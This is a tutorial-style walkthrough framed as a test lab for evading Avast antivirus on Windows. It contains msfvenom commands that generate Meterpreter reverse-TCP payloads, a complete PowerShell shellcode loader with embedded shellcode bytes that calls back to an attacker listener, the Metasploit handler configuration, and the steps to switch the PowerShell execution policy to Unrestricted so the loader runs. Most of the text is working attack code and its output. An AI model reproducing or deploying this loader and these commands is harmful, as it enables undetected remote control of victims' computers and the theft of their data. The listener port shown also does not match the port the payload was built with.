Bypassing Avast Antivirus: Testing and Executing Undetected Payloads

In this era of 2020, viruses are commonly found, which will attack our devices and antiviruses play a very important role in warding off viruses that attack our devices. You could say that with antivirus, various attacks, be it malware, adware, and viruses in general, cannot attack our devices, but what if we can bypass the antivirus so that our virus program can run without being detected by the antivirus.

Here I will do a test lab to bypass avast antivirus and this is the latest version of avast. First I will test creating a regular payload with the command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > test.exe

We will test to the virustotal web and get the results as shown in the picture.

It appears that our shell is detected in each antivirus, now we run it on windows that have avast antivirus, to make sure it is detected.

It is certain that the virus will be detected in Avast, then we will create a payload with the powershell format, namely "ps1" with additional code to bypass the avast antivirus.

You can follow the script code below and add shell code with the command :

Payload for 32bit:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f powershell

Payload for 64bit:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f powershell

script code :

$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -p assthru;

[Byte[]];
[Byte[]] $sc = 0xfc,0xe8,0x8f,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0xf,0xb7,0x4a,0x26,0x8b,0x72,0x28,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0x49,0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x1,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x1,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x1,0xd3,0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xc0,0xc1,0xcf,0xd,0xac,0x1,0xc7,0x38,0xe0,0x75,0xf4,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe0,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xc0,0xa8,0x1,0x7,0x68,0x2,0x0,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x67,0x0,0x0,0x0,0x6a,0x0,0x6a,0x4,0x56,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x68,0x0,0x40,0x0,0x0,0x6a,0x0,0x50,0x68,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0xc,0x24,0xf,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x1,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;
$size = 0x1000;

if ($sc.Length -gt 0x1000) {$size = $sc.Length};

$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

We continue now to test on virustotal, it will appear as below:

It can be seen that the avast antivirus is not detected as a threat or virus, even though there are 6 antiviruses that detect it as a threat, we continue with virus scanning in avast with the condition that the file is already in windows.

It can be seen that the file is not detected as a virus or threat, now we test running the script in powershell and don't forget to activate metasploit with the module:

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp #for 32bitmsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp #for 64bit
msf6 exploit(multi/handler) > set lhost 192.168.1.7 #THIS IS YOUR IP MADE IN MSFVENOM
lhost => 192.168.1.7msf6 exploit(multi/handler) > options 
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.7      yes       The listen address (an interface may be specified)
   LPORT     7788             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Targetmsf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.7:7788

Next we will execute the payload in windows as below:

Above we can see that we cannot run the program because of the policy on powershell, not because of the antivirus. We will set the execution scope powershell can run our script.

Do it according to the command below:

PS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUser
UndefinedPS C:\Users\User\Desktop> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

Execution Policy ChangeThe execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose you to the security risks described in the about_Execution_Policies help
topic at https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): APS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUserUnrestricted

We have made the policy change in powershell, now we repeat running our payload with the command:

C:\WINDOWS\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\WINDOWS\system32> cd C:\Users\User\Desktop\PS C:\Users\User\Desktop> .\avtest.ps1
Security warning
Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your
computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning
message. Do you want to run C:\Users\User\Desktop\avtest.ps1?
[D] Do not run  [R] Run once  [S] Suspend  [?] Help (default is "D"): R

IsPublic IsSerial Name                                     BaseType
-------- -------- ----                                     --------
True     True     Byte[]                                   System.Array
447807488
447807489
447807490
447807491
447807492
447807493
447807494
447807495
447807496
447807497
447807498
447807499
447807500
447807501
447807502
447807503
447807504
447807505
447807506
.................